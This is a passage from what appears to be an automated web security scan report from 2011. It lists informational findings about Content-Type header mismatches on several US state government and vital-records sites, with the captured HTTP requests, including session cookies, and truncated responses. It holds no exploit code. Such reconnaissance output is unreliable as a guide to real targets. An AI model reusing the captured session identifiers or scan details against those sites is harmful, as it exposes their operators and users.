The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.nh.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:36:43 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 10:00:00 GMT
ETag: "770047-e36-4218a800"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h...&... ..............(....... ...........@...........................R...{....Is.B(B.....B}R.........{.s.s...kUc.)m...41.....1Ec.Ru{..........e..J.........)..AR.)}k.Z.k.J]R.....!}...U
...[SNIP]...

30.257. http://www.nist.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nist.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:13 GMT
Server: Apache
Last-Modified: Thu, 30 Sep 2010 13:17:01 GMT
ETag: "3568017-13e-49179e4b54d40"
Accept-Ranges: bytes
Content-Length: 318
NIST: g3
Content-Type: text/plain

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

30.258. http://www.nist.gov/style/web_fonts/functionpro_medium_macroman/FunctionPro-Medium-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nist.gov
Path:   /style/web_fonts/functionpro_medium_macroman/FunctionPro-Medium-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /style/web_fonts/functionpro_medium_macroman/FunctionPro-Medium-webfont.woff HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://www.nist.gov/srd/onlinelist.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:08 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 19:57:20 GMT
ETag: "cfc91e-7e34-48d696c9aa800"
Accept-Ranges: bytes
Content-Length: 32308
NIST: g3
Content-Type: text/plain

wOFF......~4.......0........................FFTM..~.........SF.GGDEF..]....(...,.0..GPOS.._\......Q...s.GSUB..].........Z(L.OS/2.......[...`.V..cmap...l...z......A.cvt .......8...8....fpgm...........e
...[SNIP]...

30.259. http://www.ri.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ri.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=53040939.1304117314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53040939.341417921.1304117314.1304117314.1304117314.1; __utmc=53040939; __utmb=53040939.2.10.1304117314; font_level=0; switchable_style=highvis

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:48:34 GMT
Server: www
Last-Modified: Tue, 05 May 2009 14:56:26 GMT
ETag: "43a-4692b7ba89a80"
Accept-Ranges: bytes
Content-Length: 1082
Content-Type: text/plain

............ .$.......(............. ..................................l...l...l...l.@.................................................l...l...l...l...l...l...l. .l.P.l...l.p.l.0.....................l
...[SNIP]...

30.260. http://www.ri.gov/img/governmentbox/seal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ri.gov
Path:   /img/governmentbox/seal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /img/governmentbox/seal.gif HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:48:19 GMT
Server: www
Last-Modified: Mon, 17 May 2010 18:59:18 GMT
ETag: "d61-486ced2640d80"
Accept-Ranges: bytes
Content-Length: 3425
Content-Type: image/gif

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................p....
...[SNIP]...

30.261. http://www.state.mn.us/mn/content_images/images/ExploreMN_Logo_nspallet_copy.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.state.mn.us
Path:   /mn/content_images/images/ExploreMN_Logo_nspallet_copy.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /mn/content_images/images/ExploreMN_Logo_nspallet_copy.jpg HTTP/1.1
Host: www.state.mn.us
Proxy-Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:28 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 17:29:06 GMT
ETag: "18ef05-8b5-bf301c80"
Accept-Ranges: bytes
Content-Length: 2229
Content-Type: image/jpeg

......JFIF.....d.d......Ducky..............Adobe.d..........................."....."#......##)*-*)#66;;66AAAAAAAAAAAAAAA......................+.. ..+8(####(825---52<<88<<AAAAAAAAAAAAAAA......V....
...[SNIP]...

30.262. http://www.state.mn.us/mn/content_images/images/ad_license-minnesota.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.state.mn.us
Path:   /mn/content_images/images/ad_license-minnesota.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /mn/content_images/images/ad_license-minnesota.jpg HTTP/1.1
Host: www.state.mn.us
Proxy-Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:28 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 17:28:15 GMT
ETag: "18ec7d-d6e-bc25e9c0"
Accept-Ranges: bytes
Content-Length: 3438
Content-Type: image/jpeg

......JFIF.....d.d......Ducky..............Adobe.d..........................."....."#......##)*-*)#66;;66AAAAAAAAAAAAAAA......................+.. ..+8(####(825---52<<88<<AAAAAAAAAAAAAAA......V....
...[SNIP]...

30.263. http://www.state.mn.us/mn/content_images/images/governor-dayton_northstar-ad.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.state.mn.us
Path:   /mn/content_images/images/governor-dayton_northstar-ad.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /mn/content_images/images/governor-dayton_northstar-ad.jpg HTTP/1.1
Host: www.state.mn.us
Proxy-Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:27 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 18:20:13 GMT
ETag: "18efe7-6887-75fed140"
Accept-Ranges: bytes
Content-Length: 26759
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

30.264. https://www.tennesseeanytime.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tennesseeanytime.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-2

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:09 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 19:38:27 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@......................................'...........................'...............................r...................................r......................
...[SNIP]...

30.265. https://www.tennesseeanytime.org/includes/alert/alert.shtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tennesseeanytime.org
Path:   /includes/alert/alert.shtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /includes/alert/alert.shtml HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:06 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- NO ALERT INCLUDES -->
<div class="alert"> <!-- Alert div do not change -->
</div>

30.266. http://www.tn.gov/css/fonts/aller_it-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tn.gov
Path:   /css/fonts/aller_it-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /css/fonts/aller_it-webfont.woff HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:26 GMT
Server: Apache
Last-Modified: Sat, 15 Jan 2011 16:55:23 GMT
ETag: "c4f0c-7888-6aab14c0"
Accept-Ranges: bytes
Content-Length: 30856
Content-Type: text/plain

wOFF......x........<........................FFTM............Z..%GDEF.......L...\.'..GPOS.......p....1.1CGSUB...l... ... l.t.OS/2.......[...`.Wn cmap.............:.?cvt .......P...P.0.qfpgm...........e
...[SNIP]...

30.267. http://www.tn.gov/css/fonts/aller_lt-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tn.gov
Path:   /css/fonts/aller_lt-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /css/fonts/aller_lt-webfont.woff HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:25 GMT
Server: Apache
Last-Modified: Sat, 15 Jan 2011 16:55:25 GMT
ETag: "c4f21-69e8-6ac99940"
Accept-Ranges: bytes
Content-Length: 27112
Content-Type: text/plain

wOFF......i........p........................FFTM............Z...GDEF.......L...\.'..GPOS.......c...z0.0'GSUB...`... ... l.t.OS/2.......X...`.an^cmap.............:.?cvt ...x...>...>....fpgm...........e
...[SNIP]...

30.268. http://www.tn.gov/css/fonts/aller_rg-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tn.gov
Path:   /css/fonts/aller_rg-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /css/fonts/aller_rg-webfont.woff HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:32 GMT
Server: Apache
Last-Modified: Sat, 15 Jan 2011 16:55:25 GMT
ETag: "c59cb-6ca4-6ac99940"
Accept-Ranges: bytes
Content-Length: 27812
Content-Type: text/plain

wOFF......l........8........................FFTM............Z...GDEF.......L...\.'..GPOS.......c...z0.0'GSUB...`... ... l.t.OS/2.......Y...`._nrcmap.............:.?cvt ...|...N...N.;..fpgm...........e
...[SNIP]...

30.269. http://www.tn.gov/includes/alert/alert.shtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tn.gov
Path:   /includes/alert/alert.shtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /includes/alert/alert.shtml HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:31 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 87
Content-Type: text/html; charset=UTF-8


<!-- NO ALERT INCLUDES -->
<div class="alert"> <!-- Alert div do not change -->
</div>

30.270. http://www.utah.gov/keywordsearch/applicationcount.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /keywordsearch/applicationcount.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /keywordsearch/applicationcount.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
Origin: http://www.utah.gov
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25
Content-Length: 0

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun Java System Application Server 9.1_01
Content-Type: text/html; charset=iso-8859-1
Content-Length: 4
Date: Sat, 30 Apr 2011 11:13:30 GMT

1283

30.271. http://www.utah.gov/locationaware/ipLookUp.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /locationaware/ipLookUp.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /locationaware/ipLookUp.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
Origin: http://www.utah.gov
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25
Content-Length: 0

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun Java System Application Server 9.1_01
Content-Type: text/html; charset=iso-8859-1
Content-Length: 20
Date: Sat, 30 Apr 2011 11:13:30 GMT

Salt Lake City:84101

30.272. http://www.utah.gov/whatsnew/files/image-4739  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /whatsnew/files/image-4739

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /whatsnew/files/image-4739 HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=61e5009172a9a878d75f5050503b; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:15:14 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 00:17:18 GMT
ETag: "19a0148-42c5-4a20398bd7f80"
Accept-Ranges: bytes
Content-Length: 17093
Content-Type: text/plain

......JFIF.............C...........................    .

   .        
...
...        .......
.............C.............    .............................................................."..............................
...[SNIP]...

30.273. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/global/style/cfmstyle.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /ada/global/style/cfmstyle.css HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:12:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT
Content-Type: text/css

We're sorry, but a fatal error has occurred (no client variables).

30.274. http://www.visitflorida.com/includes/js/footerSurvey.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /includes/js/footerSurvey.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vf_survey_id=ucr8rgmvej8vuckb1d2o3lktc1; expires=Sun, 29-Apr-2012 12:41:04 GMT; path=/
Set-Cookie: vf_survey_pages=1; expires=Sun, 29-Apr-2012 12:41:04 GMT; path=/
Content-Length: 2147
Connection: close
Content-Type: text/html; charset=UTF-8

if (typeof(console)=="object") console.log("cid=ucr8rgmvej8vuckb1d2o3lktc1");if (typeof(console)=="object") console.log("newcount=528376");


var s_show = false;

if (typeof(console)=='ob
...[SNIP]...

30.275. http://www.vitalchek.com/js/google_analytics_js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vitalchek.com
Path:   /js/google_analytics_js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/google_analytics_js.aspx HTTP/1.1
Host: www.vitalchek.com
Proxy-Connection: keep-alive
Referer: http://www.vitalchek.com/louisiana-express-vital-records.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:08:27 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 22769


var _gat=new Object({c:"length",lb:"4.3",m:"cookie",b:undefined,cb:function(d,a){this.zb=d;this.Nb=a},r:"__utma=",W:"__utmb=",ma:"__utmc=",Ta:"__utmk=",na:"__utmv=",oa:"__utmx=",Sa:"GASO=",X
...[SNIP]...

30.276. https://www.vitalchek.com/AjaxFAQServer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.vitalchek.com
Path:   /AjaxFAQServer.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /AjaxFAQServer.aspx HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
Origin: https://www.vitalchek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.2.10.1304125733
Content-Length: 25

data=headers&tryAttempt=0

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:38 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 190


<ul class="orderTipList" >

<li class="orderTipListItem"><a href="javascript:viewFAQBody('43')">Why do you need to know if I am ordering my own certificate?</a></li>

</ul>

30.277. https://www.vitalchek.com/AjaxOrderStepServer.aspx  previous  next

Summary

Severity:   Information
